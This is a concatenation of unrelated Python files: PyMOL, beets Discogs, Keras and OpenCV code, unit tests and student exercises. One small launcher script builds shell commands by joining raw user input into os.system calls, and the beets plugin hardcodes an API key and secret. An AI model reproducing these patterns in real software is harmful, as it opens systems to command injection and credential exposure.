posenum = 0
#Iterate over all indecies in the atomlist series. Using atomlist_chain because they are all the same.
for atomidx in range(len(stored.atomlist_chain)):
#If this is a new chain or new resi...
if (stored.atomlist_chain[atomidx] != curchain or stored.atomlist_resi[atomidx] != curresi):
#Reset the current chain and resi
curchain = stored.atomlist_chain[atomidx]
curresi = stored.atomlist_resi[atomidx]
#Increment the posenum
posenum = posenum + 1
#Check if the current chain and resi are in atomlist.
if (str(curresi) + curchain in atomlist):
print("The pose number for residue " + str(curresi) + curchain + " is " + str(posenum) + ".\n")
cmd.extend('pdb2pose', pdb2pose)
#Configure the seq_object argument to be a selection when tab completing.
cmd.auto_arg[0]['pdb2pose'] = [ cmd.selection_sc, 'selection', ' ' ] |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, with_statement
from fudge import patch
import cuisine
from revolver import directory
from .utils import run_result
def test_revolver_is_just_a_wrapper():
assert directory.attributes == cuisine.dir_attribs
assert directory.attributes_get == cuisine.file_attribs_get
assert directory.ensure == cuisine.dir_ensure
assert directory.exists == cuisine.dir_exists
assert directory.is_link == cuisine.file_is_link
@patch("revolver.directory.mkdtemp")
def test_temp_local(mkdtemp):
mkdtemp.expects_call().returns(run_result("path"))
assert directory.temp_local() == "path"
@patch("revolver.core.run")
@patch("revolver.directory.attributes")
def test_temp_calles_mktemp(run, attributes):
(run.expects_call()
.with_args("mktemp --directory")
.returns(run_result("foo")))
attributes.expects_call()
assert directory.temp() == "foo"
@patch("revolver.core.run")
@patch("revolver.directory.attributes")
def test_temp_default_attributes(run, attributes):
run.expects_call().returns(run_result("path"))
(attributes.expects_call()
.with_args("path", mode=None, owner=None, group=None))
directory.temp()
@patch("revolver.core.run")
@patch("revolver.directory.attributes")
def test_temp_passes_attributes(run, attributes):
run.expects_call().returns(run_result("path"))
(attributes.expects_call()
.with_args("path", mode="foo", owner="bar", group="baz"))
directory.temp("foo", "bar", "baz")
@patch("revolver.core.run")
def test_remove_defaults(run):
run.expects_call().with_args("rm -f path")
directory.remove("path")
@patch("revolver.core.run")
def test_remove_recusrive(run):
run.expects_call().with_args("rm -f path")
directory.remove("path", recursive=False)
run.expects_call().with_args("rm -f -r path")
directory.remove("path", recursive=True)
@patch("revolver.core.run")
def test_remove_force(run):
run.expects_call().with_args("rm path")
directory.remove("path", force=False)
run.expects_call().with_args("rm -f path")
directory.remove("path", force=True)
@patch("revolver.core.run")
@patch("revolver.directory.exists")
def test_create_if_path_exists(run, exists):
exists.expects_call().with_args("path").returns(True)
directory.create("path")
@patch("revolver.core.run")
@patch("revolver.directory.exists")
def test_create_defaults(run, exists):
exists.expects_call().with_args("path").returns(False)
run.expects_call().with_args("mkdir path")
directory.create("path")
@patch("revolver.core.run")
@patch("revolver.directory.exists")
def test_create_recursive(run, exists):
exists.expects_call().returns(False)
run.expects_call().with_args("mkdir -p path")
directory.create("path", recursive=True)
@patch("revolver.core.run")
@patch("revolver.directory.exists")
@patch("revolver.directory.attributes")
def test_create_default_attributes(run, exists, attributes):
run.expects_call().with_args("mkdir path")
exists.expects_call().returns(False)
(attributes.expects_call()
.with_args("path", mode=None, owner=None, group=None))
directory.create("path")
@patch("revolver.core.run")
@patch("revolver.directory.exists")
@patch("revolver.directory.attributes")
def test_create_passes_attributes(run, exists, attributes):
run.expects_call().with_args("mkdir path")
exists.expects_call().returns(False)
(attributes.expects_call()
.with_args("path", mode="foo", owner="bar", group="baz"))
directory.create("path", mode="foo", owner="bar", group="baz")
|
import os
import numpy as np
import tables
from scipy.ndimage import zoom
from fetal_net.utils.utils import read_img, transpose_if_needed
from .normalize import normalize_data_storage, normalize_data_storage_each, normalize_data_storage_each_clip_and_norm, \
normalize_data_storage_each_just_stretch, normalize_data_storage_each_stretch_and_norm, \
normalize_data_storage_each_minmax, normalize_data_storage_each_just_clip, new_clip_and_stretch_each
def create_data_file(out_file, add_pred, n_samples):
hdf5_file = tables.open_file(out_file, mode='w')
filters = tables.Filters(complevel=5, complib='blosc')
data_storage = hdf5_file.create_vlarray(hdf5_file.root, 'data', tables.ObjectAtom(), filters=filters,
expectedrows=n_samples)
truth_storage = hdf5_file.create_vlarray(hdf5_file.root, 'truth', tables.ObjectAtom(), filters=filters,
expectedrows=n_samples)
if add_pred is not None:
pred_storage = hdf5_file.create_vlarray(hdf5_file.root, 'pred', tables.ObjectAtom(), filters=filters,
expectedrows=n_samples)
return hdf5_file, data_storage, truth_storage, pred_storage
else:
return hdf5_file, data_storage, truth_storage, None
def bounding_box_naive(truth_img):
"""returns a list containing the bottom left and the top right
points in the sequence
Here, we use min and max four times over the collection of points
"""
i, j, k = np.where(truth_img == 1)
bot_slice = max(k.min() - 2, 0)
top_slice = min(k.max() + 2, truth_img.shape[-1])
bot_left_x = max(i.min() - 16, 0)
top_right_x = min(i.max() + 16, truth_img.shape[0])
bot_left_y = max(j.min() - 16, 0)
top_right_y = min(j.max() + 16, truth_img.shape[1])
return [(bot_left_x, top_right_x), (bot_left_y, top_right_y), (bot_slice, top_slice)]
def write_image_data_to_file(image_files, data_storage, truth_storage, pred_storage, add_pred, truth_dtype=np.uint8):
# TODO add scaling option as well
for set_of_files in image_files:
images = [read_img(_) for _ in set_of_files]
# subject_data = [zoom(transpose_if_needed(image.get_data()), [0.25, 0.25, 1]) for image in images]
subject_data = [transpose_if_needed(image.get_data()) for image in images]
if len(subject_data) > 0:
#bb = bounding_box_naive(subject_data[-1])
#for i, _ in enumerate(subject_data):
# print(f"Data shape before narrow: {subject_data[i].shape}")
# subject_data[i] = subject_data[i][bb[0][0]:bb[0][1], bb[1][0]:bb[1][1], bb[2][0]:bb[2][1]]
# print(f"Data shape after narrow: {subject_data[i].shape}")
add_data_to_storage(data_storage, truth_storage, pred_storage, add_pred, subject_data, truth_dtype)
return data_storage, truth_storage
def add_data_to_storage(data_storage, truth_storage, pred_storage, add_pred, subject_data, truth_dtype):
# Can range from 1-3
# TODO - add parameter to control which modalities are given here?
# TODO - currently infers 2 modalities according to add_pred
n_modalities = len(subject_data)
print(f"n_modalities: {n_modalities}")
data_ind = 0
if n_modalities == 2 and add_pred:
pred_ind = 1
truth_ind = -1
elif n_modalities == 2 and not add_pred:
pred_ind = -1
truth_ind = 1
elif n_modalities == 3 and add_pred:
pred_ind = 1
truth_ind = 2
elif n_modalities == 1:
pred_ind = -1
truth_ind = -1
else:
raise ValueError(f"Amount of modalities is {n_modalities}, add_pred is {add_pred}. What should happen?")
data_storage.append(np.asarray(subject_data[data_ind]).astype(np.float))
if pred_ind > 0:
pred_storage.append(np.asarray(subject_data[pred_ind]).astype(np.float))
if truth_ind > 0:
truth_storage.append(np.asarray(subject_data[truth_ind], dtype=truth_dtype))
def write_data_to_file(training_data_files, out_file, truth_dtype=np.uint8,
subject_ids=None, normalize='all', add_pred=None):
"""
Takes in a set of training images and writes those images to an hdf5 file.
:param training_data_files: List of tuples containing the training data files. The modalities should be listed in
the same order in each tuple. The last item in each tuple must be the labeled image.
Example: [('sub1-T1.nii.gz', 'sub1-T2.nii.gz', 'sub1-truth.nii.gz'),
('sub2-T1.nii.gz', 'sub2-T2.nii.gz', 'sub2-truth.nii.gz')]
:param out_file: Where the hdf5 file will be written to.
:param truth_dtype: Default is 8-bit unsigned integer.
:return: Location of the hdf5 file with the image data written to it.
"""
n_samples = len(training_data_files)
try:
hdf5_file, data_storage, truth_storage, pred_storage = create_data_file(out_file, add_pred, n_samples=n_samples)
except Exception as e:
# If something goes wrong, delete the incomplete data file
os.remove(out_file)
raise e
write_image_data_to_file(training_data_files, data_storage, truth_storage, pred_storage, add_pred,
truth_dtype=truth_dtype)
if subject_ids:
hdf5_file.create_array(hdf5_file.root, 'subject_ids', obj=subject_ids)
if isinstance(normalize, str):
_, mean, std = {
'all': normalize_data_storage,
'each': normalize_data_storage_each,
'each_stretch': normalize_data_storage_each_just_stretch,
'each_stretch_and': normalize_data_storage_each_stretch_and_norm,
'each_clip': normalize_data_storage_each_just_clip,
'each_clip_and': normalize_data_storage_each_clip_and_norm,
'each_minmax': normalize_data_storage_each_minmax,
'each_new': new_clip_and_stretch_each
}[normalize](data_storage)
else:
mean, std = None, None
hdf5_file.close()
return out_file, (mean, std)
def open_data_file(filename, readwrite="r"):
return tables.open_file(filename, readwrite)
|
# Name: Taidgh Murray
# Student ID: 15315901
# File: archery.py
############################################################################
import graphics
win = graphics.GraphWin('Archery Target')
point=graphics.Point(100,100)
Targetwhite=graphics.Circle(point, 50)
Targetwhite.setFill('White')
Targetwhite.draw(win)
Targetblack=graphics.Circle(point, 40)
Targetblack.setFill('Black')
Targetblack.draw(win)
Targetblue=graphics.Circle(point, 30)
Targetblue.setFill('Blue')
Targetblue.draw(win)
Targetred=graphics.Circle(point, 20)
Targetred.setFill('Red')
Targetred.draw(win)
Targetyellow=graphics.Circle(point, 10)
Targetyellow.setFill('Yellow')
Targetyellow.draw(win)
# this waits until you have clicked in the window to close it.
win.getMouse()
win.close()
|
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Adds Discogs album search support to the autotagger. Requires the
python3-discogs-client library.
"""
import beets.ui
from beets import config
from beets.util.id_extractors import extract_discogs_id_regex
from beets.autotag.hooks import AlbumInfo, TrackInfo, string_dist
from beets.plugins import MetadataSourcePlugin, BeetsPlugin, get_distance
import confuse
from discogs_client import __version__ as dc_string
from discogs_client import Release, Master, Client
from discogs_client.exceptions import DiscogsAPIError
from requests.exceptions import ConnectionError
import http.client
import beets
import re
import time
import json
import socket
import os
import traceback
from string import ascii_lowercase
USER_AGENT = f'beets/{beets.__version__} +https://beets.io/'
API_KEY = 'rAzVUQYRaoFjeBjyWuWZ'
API_SECRET = 'plxtUTqoCzwxZpqdPysCwGuBSmZNdZVy'
# Exceptions that discogs_client should really handle but does not.
CONNECTION_ERRORS = (ConnectionError, socket.error, http.client.HTTPException,
ValueError, # JSON decoding raises a ValueError.
DiscogsAPIError)
class DiscogsPlugin(BeetsPlugin):
def __init__(self):
super().__init__()
self.check_discogs_client()
self.config.add({
'apikey': API_KEY,
'apisecret': API_SECRET,
'tokenfile': 'discogs_token.json',
'source_weight': 0.5,
'user_token': '',
'separator': ', ',
'index_tracks': False,
'append_style_genre': False,
})
self.config['apikey'].redact = True
self.config['apisecret'].redact = True
self.config['user_token'].redact = True
self.discogs_client = None
self.register_listener('import_begin', self.setup)
def check_discogs_client(self):
"""Ensure python3-discogs-client version >= 2.3.15
"""
dc_min_version = [2, 3, 15]
dc_version = [int(elem) for elem in dc_string.split('.')]
min_len = min(len(dc_version), len(dc_min_version))
gt_min = [(elem > elem_min) for elem, elem_min in
zip(dc_version[:min_len],
dc_min_version[:min_len])]
if True not in gt_min:
self._log.warning(('python3-discogs-client version should be '
'>= 2.3.15'))
def setup(self, session=None):
"""Create the `discogs_client` field. Authenticate if necessary.
"""
c_key = self.config['apikey'].as_str()
c_secret = self.config['apisecret'].as_str()
# Try using a configured user token (bypassing OAuth login).
user_token = self.config['user_token'].as_str()
if user_token:
# The rate limit for authenticated users goes up to 60
# requests per minute.
self.discogs_client = Client(USER_AGENT, user_token=user_token)
return
# Get the OAuth token from a file or log in.
try:
with open(self._tokenfile()) as f:
tokendata = json.load(f)
except OSError:
# No token yet. Generate one.
token, secret = self.authenticate(c_key, c_secret)
else:
token = tokendata['token']
secret = tokendata['secret']
self.discogs_client = Client(USER_AGENT, c_key, c_secret,
token, secret)
def reset_auth(self):
"""Delete token file & redo the auth steps.
"""
os.remove(self._tokenfile())
self.setup()
def _tokenfile(self):
"""Get the path to the JSON file for storing the OAuth token.
"""
return self.config['tokenfile'].get(confuse.Filename(in_app_dir=True))
def authenticate(self, c_key, c_secret):
# Get the link for the OAuth page.
auth_client = Client(USER_AGENT, c_key, c_secret)
try:
_, _, url = auth_client.get_authorize_url()
except CONNECTION_ERRORS as e:
self._log.debug('connection error: {0}', e)
raise beets.ui.UserError('communication with Discogs failed')
beets.ui.print_("To authenticate with Discogs, visit:")
beets.ui.print_(url)
# Ask for the code and validate it.
code = beets.ui.input_("Enter the code:")
try:
token, secret = auth_client.get_access_token(code)
except DiscogsAPIError:
raise beets.ui.UserError('Discogs authorization failed')
except CONNECTION_ERRORS as e:
self._log.debug('connection error: {0}', e)
raise beets.ui.UserError('Discogs token request failed')
# Save the token for later use.
self._log.debug('Discogs token {0}, secret {1}', token, secret)
with open(self._tokenfile(), 'w') as f:
json.dump({'token': token, 'secret': secret}, f)
return token, secret
def album_distance(self, items, album_info, mapping):
"""Returns the album distance.
"""
return get_distance(
data_source='Discogs',
info=album_info,
config=self.config
)
def track_distance(self, item, track_info):
"""Returns the track distance.
"""
return get_distance(
data_source='Discogs',
info=track_info,
config=self.config
)
def candidates(self, items, artist, album, va_likely, extra_tags=None):
"""Returns a list of AlbumInfo objects for discogs search results
matching an album and artist (if not various).
"""
if not self.discogs_client:
return
if not album and not artist:
self._log.debug('Skipping Discogs query. Files missing album and '
'artist tags.')
return []
if va_likely:
query = album
else:
query = f'{artist} {album}'
try:
return self.get_albums(query)
except DiscogsAPIError as e:
self._log.debug('API Error: {0} (query: {1})', e, query)
if e.status_code == 401:
self.reset_auth()
return self.candidates(items, artist, album, va_likely)
else:
return []
except CONNECTION_ERRORS:
self._log.debug('Connection error in album search', exc_info=True)
return []
def get_track_from_album_by_title(self, album_info, title,
dist_threshold=0.3):
def compare_func(track_info):
track_title = getattr(track_info, "title", None)
dist = string_dist(track_title, title)
return (track_title and dist < dist_threshold)
return self.get_track_from_album(album_info, compare_func)
def get_track_from_album(self, album_info, compare_func):
"""Return the first track of the release where `compare_func` returns
true.
:return: TrackInfo object.
:rtype: beets.autotag.hooks.TrackInfo
"""
if not album_info:
return None
for track_info in album_info.tracks:
# check for matching position
if not compare_func(track_info):
continue
# attach artist info if not provided
if not track_info['artist']:
track_info['artist'] = album_info.artist
track_info['artist_id'] = album_info.artist_id
# attach album info
track_info['album'] = album_info.album
return track_info
return None
def item_candidates(self, item, artist, title):
"""Returns a list of TrackInfo objects for Search API results
matching ``title`` and ``artist``.
:param item: Singleton item to be matched.
:type item: beets.library.Item
:param artist: The artist of the track to be matched.
:type artist: str
:param title: The title of the track to be matched.
:type title: str
:return: Candidate TrackInfo objects.
:rtype: list[beets.autotag.hooks.TrackInfo]
"""
if not self.discogs_client:
return
if not artist and not title:
self._log.debug('Skipping Discogs query. File missing artist and '
'title tags.')
return
query = f'{artist} {title}'
try:
albums = self.get_albums(query)
except DiscogsAPIError as e:
self._log.debug('API Error: {0} (query: {1})', e, query)
if e.status_code == 401:
self.reset_auth()
return self.item_candidates(item, artist, title)
else:
return []
except CONNECTION_ERRORS:
self._log.debug('Connection error in track search', exc_info=True)
candidates = []
for album_cur in albums:
self._log.debug(u'searching within album {0}', album_cur.album)
track_result = self.get_track_from_album_by_title(
album_cur, item['title']
)
if track_result:
candidates.append(track_result)
# first 10 results, don't overwhelm with options
return candidates[:10]
def album_for_id(self, album_id):
"""Fetches an album by its Discogs ID and returns an AlbumInfo object
or None if the album is not found.
"""
if not self.discogs_client:
return
self._log.debug('Searching for release {0}', album_id)
discogs_id = extract_discogs_id_regex(album_id)
if not discogs_id:
return None
result = Release(self.discogs_client, {'id': discogs_id})
# Try to obtain title to verify that we indeed have a valid Release
try:
getattr(result, 'title')
except DiscogsAPIError as e:
if e.status_code != 404:
self._log.debug('API Error: {0} (query: {1})', e,
result.data['resource_url'])
if e.status_code == 401:
self.reset_auth()
return self.album_for_id(album_id)
return None
except CONNECTION_ERRORS:
self._log.debug('Connection error in album lookup',
exc_info=True)
return None
return self.get_album_info(result)
def get_albums(self, query):
"""Returns a list of AlbumInfo objects for a discogs search query.
"""
# Strip non-word characters from query. Things like "!" and "-" can
# cause a query to return no results, even if they match the artist or
# album title. Use `re.UNICODE` flag to avoid stripping non-english
# word characters.
query = re.sub(r'(?u)\W+', ' ', query)
# Strip medium information from query, Things like "CD1" and "disk 1"
# can also negate an otherwise positive result.
query = re.sub(r'(?i)\b(CD|disc|vinyl)\s*\d+', '', query)
try:
releases = self.discogs_client.search(query,
type='release').page(1)
except CONNECTION_ERRORS:
self._log.debug("Communication error while searching for {0!r}",
query, exc_info=True)
return []
return [album for album in map(self.get_album_info, releases[:5])
if album]
def get_master_year(self, master_id):
"""Fetches a master release given its Discogs ID and returns its year
or None if the master release is not found.
"""
self._log.debug('Searching for master release {0}', master_id)
result = Master(self.discogs_client, {'id': master_id})
try:
year = result.fetch('year')
return year
except DiscogsAPIError as e:
if e.status_code != 404:
self._log.debug('API Error: {0} (query: {1})', e,
result.data['resource_url'])
if e.status_code == 401:
self.reset_auth()
return self.get_master_year(master_id)
return None
except CONNECTION_ERRORS:
self._log.debug('Connection error in master release lookup',
exc_info=True)
return None
def get_album_info(self, result):
"""Returns an AlbumInfo object for a discogs Release object.
"""
# Explicitly reload the `Release` fields, as they might not be yet
# present if the result is from a `discogs_client.search()`.
if not result.data.get('artists'):
result.refresh()
# Sanity check for required fields. The list of required fields is
# defined at Guideline 1.3.1.a, but in practice some releases might be
# lacking some of these fields. This function expects at least:
# `artists` (>0), `title`, `id`, `tracklist` (>0)
# https://www.discogs.com/help/doc/submission-guidelines-general-rules
if not all([result.data.get(k) for k in ['artists', 'title', 'id',
'tracklist']]):
self._log.warning("Release does not contain the required fields")
return None
artist, artist_id = MetadataSourcePlugin.get_artist(
[a.data for a in result.artists],
join_key='join'
)
album = re.sub(r' +', ' ', result.title)
album_id = result.data['id']
# Use `.data` to access the tracklist directly instead of the
# convenient `.tracklist` property, which will strip out useful artist
# information and leave us with skeleton `Artist` objects that will
# each make an API call just to get the same data back.
tracks = self.get_tracks(result.data['tracklist'])
# Extract information for the optional AlbumInfo fields, if possible.
va = result.data['artists'][0].get('name', '').lower() == 'various'
year = result.data.get('year')
mediums = [t.medium for t in tracks]
country = result.data.get('country')
data_url = result.data.get('uri')
style = self.format(result.data.get('styles'))
base_genre = self.format(result.data.get('genres'))
if self.config['append_style_genre'] and style:
genre = self.config['separator'].as_str().join([base_genre, style])
else:
genre = base_genre
discogs_albumid = extract_discogs_id_regex(result.data.get('uri'))
# Extract information for the optional AlbumInfo fields that are
# contained on nested discogs fields.
albumtype = media = label = catalogno = labelid = None
if result.data.get('formats'):
albumtype = ', '.join(
result.data['formats'][0].get('descriptions', [])) or None
media = result.data['formats'][0]['name']
if result.data.get('labels'):
label = result.data['labels'][0].get('name')
catalogno = result.data['labels'][0].get('catno')
labelid = result.data['labels'][0].get('id')
# Additional cleanups (various artists name, catalog number, media).
if va:
artist = config['va_name'].as_str()
if catalogno == 'none':
catalogno = None
# Explicitly set the `media` for the tracks, since it is expected by
# `autotag.apply_metadata`, and set `medium_total`.
for track in tracks:
track.media = media
track.medium_total = mediums.count(track.medium)
if not track.artist: # get_track_info often fails to find artist
track.artist = artist
if not track.artist_id:
track.artist_id = artist_id
# Discogs does not have track IDs. Invent our own IDs as proposed
# in #2336.
track.track_id = str(album_id) + "-" + track.track_alt
track.data_url = data_url
track.data_source = 'Discogs'
# Retrieve master release id (returns None if there isn't one).
master_id = result.data.get('master_id')
# Assume `original_year` is equal to `year` for releases without
# a master release, otherwise fetch the master release.
original_year = self.get_master_year(master_id) if master_id else year
return AlbumInfo(album=album, album_id=album_id, artist=artist,
artist_id=artist_id, tracks=tracks,
albumtype=albumtype, va=va, year=year,
label=label, mediums=len(set(mediums)),
releasegroup_id=master_id, catalognum=catalogno,
country=country, style=style, genre=genre,
media=media, original_year=original_year,
data_source='Discogs', data_url=data_url,
discogs_albumid=discogs_albumid,
discogs_labelid=labelid, discogs_artistid=artist_id)
def format(self, classification):
if classification:
return self.config['separator'].as_str() \
.join(sorted(classification))
else:
return None
def get_tracks(self, tracklist):
"""Returns a list of TrackInfo objects for a discogs tracklist.
"""
try:
clean_tracklist = self.coalesce_tracks(tracklist)
except Exception as exc:
# FIXME: this is an extra precaution for making sure there are no
# side effects after #2222. It should be removed after further
# testing.
self._log.debug('{}', traceback.format_exc())
self._log.error('uncaught exception in coalesce_tracks: {}', exc)
clean_tracklist = tracklist
tracks = []
index_tracks = {}
index = 0
# Distinct works and intra-work divisions, as defined by index tracks.
divisions, next_divisions = [], []
for track in clean_tracklist:
# Only real tracks have `position`. Otherwise, it's an index track.
if track['position']:
index += 1
if next_divisions:
# End of a block of index tracks: update the current
# divisions.
divisions += next_divisions
del next_divisions[:]
track_info = self.get_track_info(track, index, divisions)
track_info.track_alt = track['position']
tracks.append(track_info)
else:
next_divisions.append(track['title'])
# We expect new levels of division at the beginning of the
# tracklist (and possibly elsewhere).
try:
divisions.pop()
except IndexError:
pass
index_tracks[index + 1] = track['title']
# Fix up medium and medium_index for each track. Discogs position is
# unreliable, but tracks are in order.
medium = None
medium_count, index_count, side_count = 0, 0, 0
sides_per_medium = 1
# If a medium has two sides (ie. vinyl or cassette), each pair of
# consecutive sides should belong to the same medium.
if all([track.medium is not None for track in tracks]):
m = sorted({track.medium.lower() for track in tracks})
# If all track.medium are single consecutive letters, assume it is
# a 2-sided medium.
if ''.join(m) in ascii_lowercase:
sides_per_medium = 2
for track in tracks:
# Handle special case where a different medium does not indicate a
# new disc, when there is no medium_index and the ordinal of medium
# is not sequential. For example, I, II, III, IV, V. Assume these
# are the track index, not the medium.
# side_count is the number of mediums or medium sides (in the case
# of two-sided mediums) that were seen before.
medium_is_index = track.medium and not track.medium_index and (
len(track.medium) != 1 or
# Not within standard incremental medium values (A, B, C, ...).
ord(track.medium) - 64 != side_count + 1
)
if not medium_is_index and medium != track.medium:
side_count += 1
if sides_per_medium == 2:
if side_count % sides_per_medium:
# Two-sided medium changed. Reset index_count.
index_count = 0
medium_count += 1
else:
# Medium changed. Reset index_count.
medium_count += 1
index_count = 0
medium = track.medium
index_count += 1
medium_count = 1 if medium_count == 0 else medium_count
track.medium, track.medium_index = medium_count, index_count
# Get `disctitle` from Discogs index tracks. Assume that an index track
# before the first track of each medium is a disc title.
for track in tracks:
if track.medium_index == 1:
if track.index in index_tracks:
disctitle = index_tracks[track.index]
else:
disctitle = None
track.disctitle = disctitle
return tracks
def coalesce_tracks(self, raw_tracklist):
"""Pre-process a tracklist, merging subtracks into a single track. The
title for the merged track is the one from the previous index track,
if present; otherwise it is a combination of the subtracks titles.
"""
def add_merged_subtracks(tracklist, subtracks):
"""Modify `tracklist` in place, merging a list of `subtracks` into
a single track into `tracklist`."""
# Calculate position based on first subtrack, without subindex.
idx, medium_idx, sub_idx = \
self.get_track_index(subtracks[0]['position'])
position = '{}{}'.format(idx or '', medium_idx or '')
if tracklist and not tracklist[-1]['position']:
# Assume the previous index track contains the track title.
if sub_idx:
# "Convert" the track title to a real track, discarding the
# subtracks assuming they are logical divisions of a
# physical track (12.2.9 Subtracks).
tracklist[-1]['position'] = position
else:
# Promote the subtracks to real tracks, discarding the
# index track, assuming the subtracks are physical tracks.
index_track = tracklist.pop()
# Fix artists when they are specified on the index track.
if index_track.get('artists'):
for subtrack in subtracks:
if not subtrack.get('artists'):
subtrack['artists'] = index_track['artists']
# Concatenate index with track title when index_tracks
# option is set
if self.config['index_tracks']:
for subtrack in subtracks:
subtrack['title'] = '{}: {}'.format(
index_track['title'], subtrack['title'])
tracklist.extend(subtracks)
else:
# Merge the subtracks, pick a title, and append the new track.
track = subtracks[0].copy()
track['title'] = ' / '.join([t['title'] for t in subtracks])
tracklist.append(track)
# Pre-process the tracklist, trying to identify subtracks.
subtracks = []
tracklist = []
prev_subindex = ''
for track in raw_tracklist:
# Regular subtrack (track with subindex).
if track['position']:
_, _, subindex = self.get_track_index(track['position'])
if subindex:
if subindex.rjust(len(raw_tracklist)) > prev_subindex:
# Subtrack still part of the current main track.
subtracks.append(track)
else:
# Subtrack part of a new group (..., 1.3, *2.1*, ...).
add_merged_subtracks(tracklist, subtracks)
subtracks = [track]
prev_subindex = subindex.rjust(len(raw_tracklist))
continue
# Index track with nested sub_tracks.
if not track['position'] and 'sub_tracks' in track:
# Append the index track, assuming it contains the track title.
tracklist.append(track)
add_merged_subtracks(tracklist, track['sub_tracks'])
continue
# Regular track or index track without nested sub_tracks.
if subtracks:
add_merged_subtracks(tracklist, subtracks)
subtracks = []
prev_subindex = ''
tracklist.append(track)
# Merge and add the remaining subtracks, if any.
if subtracks:
add_merged_subtracks(tracklist, subtracks)
return tracklist
def get_track_info(self, track, index, divisions):
"""Returns a TrackInfo object for a discogs track.
"""
title = track['title']
if self.config['index_tracks']:
prefix = ', '.join(divisions)
if prefix:
title = f'{prefix}: {title}'
track_id = None
medium, medium_index, _ = self.get_track_index(track['position'])
artist, artist_id = MetadataSourcePlugin.get_artist(
track.get('artists', []),
join_key='join'
)
length = self.get_track_length(track['duration'])
return TrackInfo(title=title, track_id=track_id, artist=artist,
artist_id=artist_id, length=length, index=index,
medium=medium, medium_index=medium_index)
def get_track_index(self, position):
"""Returns the medium, medium index and subtrack index for a discogs
track position."""
# Match the standard Discogs positions (12.2.9), which can have several
# forms (1, 1-1, A1, A1.1, A1a, ...).
match = re.match(
r'^(.*?)' # medium: everything before medium_index.
r'(\d*?)' # medium_index: a number at the end of
# `position`, except if followed by a subtrack
# index.
# subtrack_index: can only be matched if medium
# or medium_index have been matched, and can be
r'((?<=\w)\.[\w]+' # - a dot followed by a string (A.1, 2.A)
r'|(?<=\d)[A-Z]+' # - a string that follows a number (1A, B2a)
r')?'
r'$',
position.upper()
)
if match:
medium, index, subindex = match.groups()
if subindex and subindex.startswith('.'):
subindex = subindex[1:]
else:
self._log.debug('Invalid position: {0}', position)
medium = index = subindex = None
return medium or None, index or None, subindex or None
def get_track_length(self, duration):
"""Returns the track length in seconds for a discogs duration.
"""
try:
length = time.strptime(duration, '%M:%S')
except ValueError:
return None
return length.tm_min * 60 + length.tm_sec
|
import os
def program():
print("Welcome to the python program that runs python programs")
print()
path = input("What is the directory of the file? : ")
os.system("cd "+path)
print("These are all the python files in this directory : ")
input("Press 'enter' to continue")
os.system("dir /S *.py")
print()
print()
print()
filename = input("What is the file you want to run? (Include '.py') : ")
print()
input("Press enter to run the file")
os.system("py "+filename)
program() |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon May 27 12:28:37 2019
@author: kj22643
"""
# This is a first pass attempt to work with the adata file and identify the
# survivors and non-survivors from the lineage information in the sample.
|
from keras.applications import inception_resnet_v2
from keras.models import Sequential
from keras.layers import Dense, Conv2D, Flatten
from keras import layers
from keras.optimizers import Adam
def build_model_Inception_Resnet():
inception_resnet = inception_resnet_v2.InceptionResNetV2(
weights='imagenet',
include_top=False,
input_shape=(224,224,3)
)
model = Sequential()
model.add(inception_resnet)
model.add(layers.GlobalMaxPooling2D())
model.add(layers.Dropout(0.5))
model.add(layers.Dense(2, activation='sigmoid'))
model.compile(
loss='categorical_crossentropy',
optimizer=Adam(lr=0.0005),
metrics=['accuracy']
)
return model
|
import unittest
from katas.kyu_7.easy_mathematical_callback import process_array
class ProcessArrayTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(
process_array([4, 8, 2, 7, 5], lambda val: val * 2),
[8, 16, 4, 14, 10]
)
def test_equals_2(self):
self.assertEqual(
process_array([7, 8, 9, 1, 2], lambda val: val + 5),
[12, 13, 14, 6, 7]
)
def test_equals_3(self):
self.assertEqual(
process_array([-1, 1, 2, 3, 4, 5], lambda val: val ** 3),
[-1, 1, 8, 27, 64, 125]
)
def test_equals_4(self):
self.assertEqual(process_array([], lambda val: val + 1), [])
|
# 胶囊气泡、大小头等瑕疵检测
import cv2 as cv
import os
import numpy as np
def balance_check(img_path, img_file, im, im_gray):
# 边沿提取
# sobel = cv.Sobel(im_gray, cv.CV_64F,
# 1, 1, ksize=5)
# cv.imshow("sobel", sobel)
# lap = cv.Laplacian(im_gray, cv.CV_64F)
# cv.imshow("lap", lap)
# 模糊、膨胀去掉过细细节
blurred = cv.GaussianBlur(im_gray, (5, 5), 0)
kernel = np.ones((5,5), np.uint8)
dilate = cv.dilate(blurred, kernel)
cv.imshow("dilate", dilate)
canny = cv.Canny(dilate, 60, 200)
cv.imshow("canny", canny)
# 在canny边沿检测图像上提取轮廓
img, cnts, hie = cv.findContours(canny,
cv.RETR_LIST,
cv.CHAIN_APPROX_NONE)
# 计算每个轮廓周长,并根据周长过滤
new_cnts = [] # 存放经过筛选的轮廓列表
if len(cnts) > 0:
for c in cnts: # 遍历每个轮廓
circle_len = cv.arcLength(c, True)
#print("circle_len:", circle_len)
if circle_len > 1000: # 过滤掉周长小于1000的轮廓
new_cnts.append(c)
# 对轮廓计算面积,并根据面积倒序排列
new_cnts = sorted(new_cnts,
key=cv.contourArea,
reverse=True)
new_cnts = new_cnts[1:2] # 切出面积第二大的轮廓
# 绘制筛选后的轮廓
im_cnt = cv.drawContours(im,
new_cnts,
-1,
(0, 0, 255), 2)
cv.imshow("im_cnt", im_cnt)
# 求药丸轮廓中线位置
max_x, max_y = new_cnts[0][0][0][0], new_cnts[0][0][0][1]
min_x, min_y = max_x, max_y
for cnt in new_cnts[0]:
if cnt[0][0] >= max_x:
max_x = cnt[0][0]
if cnt[0][0] <= min_x:
min_x = cnt[0][0]
if cnt[0][1] >= max_y:
max_y = cnt[0][1]
if cnt[0][1] <= min_y:
min_y = cnt[0][1]
# 在原图上绘制直线
#cv.line(im, (min_x, min_y), (max_x, min_y),
# (0, 0, 255), 2)
# cv.line(im, (max_x, min_y), (max_x, max_y),
# (0, 0, 255), 2)
